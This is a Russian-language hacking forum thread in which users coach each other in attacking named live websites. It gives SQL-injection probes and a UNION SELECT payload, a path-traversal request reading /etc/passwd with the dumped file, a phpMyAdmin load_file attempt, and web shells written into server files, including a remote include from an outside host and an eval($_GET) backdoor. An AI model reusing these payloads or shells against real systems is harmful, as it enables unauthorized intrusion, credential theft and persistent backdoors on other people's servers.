пробуй логику если не уверен http://arbrand.ru/kat_pos.php?id=1+and+1=1 и http://arbrand.ru/kat_pos.php?id=1+and+1=0 ну и различные /* -- # если резултат ни какого изменения то не уязвимость =) ЗЫ проверил , не пашет логика =)
Сервак на винде? Иногда там временная папка для аплоаденных файлов не задана или некорректно задана и php не может файл прочитать. Попробуй создай php файл следующий и им попробуй аплоаднуть.
это дыра в пхп кодах Пхп иньекция Вот тебе скуля http://www.warrencountypa.net/current/com.php?ID=1 На ней практикуйся
это пхп инъекция result : http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00 http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4
1 А бываю Flash Shell на action script написанные?? 2 Что полезного моно от сюда извлечь???? Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
Ты когда мозгами думать начнешь, а не тупо бежать задавать тупые вопросы в этой ветке? _http://www.warrencountypa.net/current/com.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version()),3,4,5,6+--+ 1. флеш исполняется на стороне юзера, нет 2. ничего
При выводе из БД выдаёт такие символы: Code: lIlIllIIIlllIIllIIlIlllllllIIIIlIlI причём только из колонок username И password никто не сталкивался?
могут фильтроваться колоки, или быть обманками (пустая колонка, или забитая фигней) еще можно поиграться с лимитом!!! Но я точно не знаю Если не трудно кинь скуль в лс я гляну)))
Есть рут доступ к phpmyadmin для раскрытия пути использовал точку после пхп сесии. выдало мне это Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1PHP Notice: Undefined variable: id in D:\name1\sname2\www\file.php on line 6 Далее захожу в phpmyadmin выполняю, Code: SELECT load_file( 'D:\name1\sname2\www\file.php' ) ; ответ NULL,(и другие файлы пробовал такая же фигня)я понял уже что замута с путями,что не так вышло я не пойму спасибо!
спасибо cr0w в файл пишет и вижу такой код Code: <? @include("http://xxx.narod.ru/a.txt"); ?> это я как понимаю у него прав на выполнение нету?попробовал несколько папок такая фигня везде
а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал? <?eval($_GET[e]);?> - в файл http://сайт/путь к файлу/файл.php?e=phpinfo(); PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши. НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.
Записал <?php phpinfo();?> вижу инфо пхп Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу и исходном коде <?eval($_GET[e]);?>
